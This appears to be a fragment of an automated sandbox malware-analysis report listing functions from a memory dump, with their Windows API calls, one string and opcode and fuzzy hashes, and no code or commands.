        Function 00409141 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 004069E8: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409147,00000000,0040905A,?,00000000,00000104), ref: 004069F3
        • strrchr.MSVCRT ref: 0040914A
        • _mbscat.MSVCRT ref: 0040915F
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: FileModuleName_mbscatstrrchr
        • String ID: _lng.ini
        • API String ID: 3334749609-1948609170
        • Opcode ID: 08864fd35b35f6e10160a6b7cad974f4c4e5e5894a63cb91cea6d61644888c54
        • Instruction ID: a8986b5d0fc5065fa4420194992ab4643f38d39362f1d3b193e5f677e6d35072
        • Opcode Fuzzy Hash: 08864fd35b35f6e10160a6b7cad974f4c4e5e5894a63cb91cea6d61644888c54
        • Instruction Fuzzy Hash: D7C0127124565054E11231222D03BCB05480F12705F29006FFC01781C3EE5D4A9180AE
        Function 00407E33 Relevance: 5.1, APIs: 4, Instructions: 108stringCOMMON
        Download Yara Rule
        APIs
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: FreeLocalmemcpymemsetstrlen
        • String ID:
        • API String ID: 3110682361-0
        • Opcode ID: 21470b65325c4646694a84c407f8fe9269b35ac8cd8724ca01919c7c57aa0683
        • Instruction ID: 94145ba3e6d447937b4e48053a9a2b44a3b831c7855691199b8e714b6b5b9eaf
        • Opcode Fuzzy Hash: 21470b65325c4646694a84c407f8fe9269b35ac8cd8724ca01919c7c57aa0683
        • Instruction Fuzzy Hash: 9941C372D041199BCF109FA9C841BDEBFB8EF49314F1041B6E955B7281C238AA85CFA5
        Function 004092CC Relevance: 5.1, APIs: 4, Instructions: 65COMMON
        Download Yara Rule
        APIs
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ??2@$memset
        • String ID:
        • API String ID: 1860491036-0
        • Opcode ID: 1bd1a042b885c515cafa8077495e00bace8610073d8da212d6e8c1d7679ca43c
        • Instruction ID: 542bc7e3926c6d60784d6f8799ebb0262de6c8f0aff60c73b96b1684488c9edf
        • Opcode Fuzzy Hash: 1bd1a042b885c515cafa8077495e00bace8610073d8da212d6e8c1d7679ca43c
        • Instruction Fuzzy Hash: 9621B3B0A053008FDB558F6A9845955FBF8FF94311B2AC9AFD508DB2B2D7B8C9409F14
        Function 004086ED Relevance: 5.0, APIs: 4, Instructions: 36COMMON
        Download Yara Rule
        APIs
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ??2@
        • String ID:
        • API String ID: 1033339047-0
        • Opcode ID: 949953223f8e9f4be0123e64353e30bed0322445959412ce4c80275753eae598
        • Instruction ID: 62cae8e83bd5d1efe0b7207de595a3d8a96caeb03304a295a8faf49e2a024305
        • Opcode Fuzzy Hash: 949953223f8e9f4be0123e64353e30bed0322445959412ce4c80275753eae598
        • Instruction Fuzzy Hash: 58F04FB96012005EFB589F36ED4679576F0A708309F18C53EE9058B2F4EB7444448F1D